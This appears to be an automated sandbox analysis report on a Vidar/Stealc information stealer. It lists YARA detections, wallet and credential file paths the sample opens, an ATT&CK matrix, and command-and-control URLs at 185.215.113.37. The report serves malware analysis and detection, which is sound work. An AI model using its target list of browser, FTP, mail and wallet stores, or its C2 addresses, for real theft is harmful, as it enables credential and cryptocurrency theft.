Source: Yara match	File source: 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: 0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.loca
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.:*

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.b80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707097418.0000000005000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2484, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	335 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	641 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	URL Reputation	malware
http://185.215.113.37	100%	URL Reputation	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	URL Reputation	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	URL Reputation	malware
http://185.215.113.37/e2b1563c6670f193.php	100%	URL Reputation	malware
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	URL Reputation	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	URL Reputation	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	URL Reputation: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	EGHJKJKKJDHIDHJKJDBGCGCBAE.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpRY	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllA	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37	file.exe, 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000003.1794800127.000000001D64C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php.dllL	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dllO	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37C	file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.php.dll	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	DGCFHIDAKECFHIEBFCGI.0.dr	false		unknown
http://185.215.113.37e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1802719683.00000000013E6000.00000004.00000020.00020000.00000000.sdmp, ECAKECAE.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/e2b1563c6670f193.phpf	file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll=	file.exe, 00000000.00000002.1934685574.000000000131E000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://185.215.113.37/l	file.exe, 00000000.00000002.1934685574.0000000001378000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1955337220.00000000296E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp, DGCFHIDAKECFHIEBFCGI.0.dr	false		unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1950194902.000000001D746000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958393654.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.1958804082.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false		unknown
http://185.215.113.37/e2b1563c6670f193.phpR	file.exe, 00000000.00000002.1934685574.0000000001364000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1934685574.0000000001395000.00000004.00000020.00020000.00000000.sdmp	true		unknown
